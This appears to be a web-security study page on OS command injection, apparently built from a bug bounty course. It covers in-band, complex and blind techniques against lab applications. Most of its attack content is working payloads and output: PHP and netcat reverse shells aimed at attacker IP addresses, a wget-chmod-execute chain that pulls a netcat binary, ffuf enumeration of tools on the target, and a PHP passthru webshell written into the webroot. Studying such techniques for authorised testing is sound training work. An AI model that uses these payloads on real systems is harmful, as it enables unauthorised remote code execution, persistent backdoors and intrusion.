Examples
In Band
In-Band CI occurs when the attacker can directly insert and execute malicious commands in a web application or system’s input fields or parameters, using the same channel to both send commands and receive outputs.
Simple Payload
The example below is based on TCM's Practical Bug Bounty course.
The application takes our input and passes it into a curl command which is then grepped (Figure 1.1). We can start simple by just appending a command using ;, but this gives no output (Figure 1.2). Next, we can try commenting out the grep part by using # (Figure 1.3).
We can also try to achieve by first checking what technology is used on the application and then getting a payload from a repository such as PayloadAllTheThings (Figure 2).
;php -r '$sock=fsockopen("172.31.150.94",9999);exec("/bin/sh -i <&3 >&3 2>&3");'#
Complex Payload
The example below is based on TCM's Practical Bug Bounty course.
The application we need to test tracks the fleet vehicle's coordinates and calculates the distance between its current position and its destination (Figure 3).
We have two fields that are directly inputted within the executed command. We can start by trying to manipulate the second field first (Figure 4).
# original command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}'
# our goal command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#
# the payload
222)^2))}';whoami;#
# the final command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#)^2))}'
We can achieve RCE with the same logic using the previously used payload (Figure 5).
222)^2))}';php -r '$sock=fsockopen("172.31.150.94",9999);exec("/bin/sh -i <&3 >&3 2>&3");';#
Blind
Blind CI occurs when the attacker does not see the output of the injected commands directly. Instead, they infer the success or failure of the commands through side effects or indirect responses.
The example below is based on TCM's Practical Bug Bounty course.
This time we have the same Network Checker app, but the previous attack does not work (Figure 6.1). Either something gets filtered, which we can check (Figure 6.2 & 6.3), or we the command is executed but we don't get any output on the front-end.
We can try a payload that alters the application's behaviour (similar to Blind SQLi) and see if this works. This can be tested with Burp Suite's Repeater, as it shows the response time in the bottom right corner (Figure 7).
localhost?q=`sleep 5`
We also use time and curl to measure the response time within the CLI.
$ time curl "http://localhost?q=localhost"
<html>
<SNIP>
</html>
real 0m0.062s # Normal response time
user 0m0.006s
sys 0m0.000s
$ time curl "http://localhost?q=`sleep+5`"
<html>
<SNIP>
</html>
real 0m5.063s # The 'sleep 5' payload worked
user 0m0.003s
sys 0m0.003sNext, we can achieve by spawning up a web server and passing the desired command as a parameter (Figure 8).
http://172.31.150.94:9999/?q=`whoami`
Capabilities Recon
When we achieve RCE, we can enumerate the target for useful binaries. The w00tw00t was added to the wordlist as an example of what the response of a non-existing binary looks like.
$ cat capability_checks_linux.txt
w00tw00t
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat
ss
ifconfig
ip
hostname
php
python
python3
perl
java
$ ffuf -u "http://ci-sandbox/php/index.php?ip=127.0.0.1;which%20FUZZ" -w capability_checks_linux.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://ci-sandbox/php/index.php?ip=127.0.0.1;which%20FUZZ
:: Wordlist : FUZZ: /home/x7331/web200/capability_checks_linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
java [Status: 200, Size: 491, Words: 59, Lines: 11, Duration: 4118ms]
perl [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4119ms]
ip [Status: 200, Size: 491, Words: 59, Lines: 11, Duration: 4119ms]
python [Status: 200, Size: 507, Words: 59, Lines: 12, Duration: 4119ms]
php [Status: 200, Size: 510, Words: 59, Lines: 12, Duration: 4120ms]
hostname [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4120ms]
fetch [Status: 200, Size: 492, Words: 59, Lines: 11, Duration: 4148ms]
ss [Status: 200, Size: 492, Words: 59, Lines: 11, Duration: 4148ms]
gcc [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4149ms]
ifconfig [Status: 200, Size: 507, Words: 59, Lines: 12, Duration: 4149ms]
python3 [Status: 200, Size: 508, Words: 59, Lines: 12, Duration: 4276ms]
socat [Status: 200, Size: 491, Words: 59, Lines: 11, Duration: 5268ms]
cc [Status: 200, Size: 503, Words: 59, Lines: 12, Duration: 5297ms]
nc [Status: 200, Size: 499, Words: 59, Lines: 12, Duration: 6259ms]
wget [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 6259ms]
ping [Status: 200, Size: 501, Words: 59, Lines: 12, Duration: 6291ms]
curl [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 6291ms]
w00tw00t [Status: 200, Size: 491, Words: 59, Lines: 11, Duration: 7282ms]Based on the above results, the response 491 can be filtered out.
$ ffuf -u "http://ci-sandbox/php/index.php?ip=127.0.0.1;which%20FUZZ" -w capability_checks_linux.txt -c -fs 491
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://ci-sandbox/php/index.php?ip=127.0.0.1;which%20FUZZ
:: Wordlist : FUZZ: /home/x7331/web200/capability_checks_linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 491
________________________________________________
wget [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4098ms]
curl [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4098ms]
python3 [Status: 200, Size: 508, Words: 59, Lines: 12, Duration: 4098ms]
php [Status: 200, Size: 510, Words: 59, Lines: 12, Duration: 4130ms]
cc [Status: 200, Size: 503, Words: 59, Lines: 12, Duration: 4133ms]
nc [Status: 200, Size: 499, Words: 59, Lines: 12, Duration: 4133ms]
hostname [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 4863ms]
gcc [Status: 200, Size: 504, Words: 59, Lines: 12, Duration: 5888ms]
ping [Status: 200, Size: 502, Words: 59, Lines: 12, Duration: 5920ms]
ifconfig [Status: 200, Size: 506, Words: 59, Lines: 12, Duration: 6912ms]
perl [Status: 200, Size: 505, Words: 59, Lines: 12, Duration: 6912ms]
python [Status: 200, Size: 507, Words: 59, Lines: 12, Duration: 6912ms]Reverse Shell
Next, we can try sending a reverse shell from the target to our attack host.
File Transfer
If the target is hardened and we are unable to get a reverse shell, we can try downloading a binary to the target ourselves. In the example below, we download the netcat binary, make it executable, and then execute a reverse shell payload.
wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.45.155 9090 -e /bin/bashWebshell
If we don't have access to unique binaries and we know the technology that the application uses, we can write our own backdoor. We first need to find the present working directory via the CI vulnerablity (Figure 9).
We can create a payload that creates a PHP webshell under the webroot.
echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.phpNext, we can interact via our webshell.
$ curl http://ci-sandbox/webshell.php?cmd=id
<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>Last updated
Was this helpful?